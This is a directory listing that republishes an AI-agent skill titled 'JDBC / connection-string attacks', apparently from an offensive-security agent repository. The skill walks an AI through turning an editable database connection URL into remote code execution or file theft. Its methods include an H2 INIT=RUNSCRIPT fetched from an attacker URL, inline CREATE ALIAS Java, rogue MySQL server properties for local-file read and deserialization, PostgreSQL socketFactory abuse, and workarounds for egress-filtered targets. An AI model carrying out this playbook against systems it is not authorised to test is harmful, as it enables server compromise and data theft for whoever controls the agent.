JDBC / connection-string attacks
SkillDatabases & dataTurn an attacker-controllable database connection string / JDBC URL into RCE via the driver itself. Load when an app lets you set a DB host/URL/driver: a "test connection" form, a data-source config, an ETL/reporting/integration tool, or a processor that takes a JDBC URL. Signals: a jdbc: URL field, H2/MySQL/Postgres connection settings, Apache NiFi/Mirth/Metabase/DBeaver-style data-source config, "connection string", driver properties you can edit.
Instructions available. Your AI can read the instructions. Execution depends on the setup they require.
Account requirements not reviewed. Check the skill instructions before use; ahel provides instructions and does not run this skill.
Add ahel to your AI once: Claude, ChatGPT, Cursor, Claude Code or Codex. Then ask it to use this.
Then ask your AI: use the JDBC / connection-string attacks skill
What this skill tells your AI
The instructions your AI receives, as published by noorqureshi/sploitagent in skills/web/web-jdbc-attacks/SKILL.md and read by ahel’s review.
When it applies
An application lets you influence a database connection — a full JDBC URL, host/port, or driver properties — via a "test connection" button, a data-source/integration config, or a processor in an ETL/automation tool (NiFi, Mirth, reporting suites). The connection itself becomes the exploit: several JDBC drivers execute code or read files as a side effect of connecting.
Why it works
JDBC drivers do more than open a socket — they honor URL properties that were designed for convenience and are dangerous with an attacker-controlled URL. You don't need valid credentials to a real DB; you point the driver at your server (or an in-process engine) and let a driver feature run code in the app's JVM.
Method
- Find the controllable knob — a JDBC URL field, or host/params you can edit; a "test connection" action that dials out is ideal (blind-friendly, no data needed).
- Confirm outbound control — point it at a listener you own and watch for the driver's connection (OOB proof the URL is honored).
- Pick the driver primitive:
- H2 —
CREATE ALIASmaps a Java method to SQL, soINIT=RUNSCRIPT FROM 'http://you/x.sql'(or an inlineCREATE ALIAS ... AS $$ ... $$) executes Java on connect → RCE in the JVM. A classic when an app lets you set an H2 JDBC URL (e.g. via a processor's connection pool). - MySQL (malicious server) — a rogue MySQL server +
allowLoadLocalInfile=true/autoDeserialize=true/queryInterceptorscan read client files or trigger deserialization gadget chains in the connecting app. - PostgreSQL / others —
socketFactory/socketFactoryArgand similar properties can be abused to instantiate attacker-named classes.
- H2 —
- Escalate deserialization where the driver pulls objects — combine with
web-deserializationgadget chains on the classpath. - Report the impact, not the connection — RCE/file-read in the app context, validated per
reporting-triage-validation.
Gotchas
- No real DB required — the point is the driver's behavior; a "test connection" that "fails" may
still have executed your
INIT/read your file. - Property allow/deny lists vary by driver version — a blocked property (patched
autoDeserialize) doesn't mean another (H2INIT) is blocked. - Classpath decides deserialization impact — no gadget on the classpath, no RCE that way; pivot to a driver that runs code directly (H2).
- Egress-filtered targets — favor in-process primitives (H2 inline
CREATE ALIAS) over fetch-from-URL when the app can't reach you.
Verify success
Code execution or file read in the application's JVM/host from a connection you controlled (e.g. an
H2 CREATE ALIAS command runs, or an OOB hit + a returned file), not merely a reflected error.
References
"Make JDBC Attacks Brilliant Again" research; H2 CREATE ALIAS/INIT docs; MySQL JDBC client
properties; CWE-502/94. Related: web-deserialization, web-ssrf.
Signals
- GitHub stars
- 20
- Forks
- 7
- Last commit
- Sep 2026
Advanced
- Item type
- skill
- Key
web-jdbc-attacks- Source
- github.com/noorqureshi/sploitagent
github.com/noorqureshi/sploitagent
Related picks
Skill · jabrena
The pick for Javajava-api-consistency-validator
Skill · arabelatso
The pick for Javasupabase-postgres-best-practices
Skill · asymmetric-al
The pick for Postgresgolem-add-mysql-ts
Skill · golemcloud
The pick for MySQLapi-database-mysql
Skill · agents-inc
The pick for MySQLowasp-security
Skill · davila7
The pick for Web (OWASP)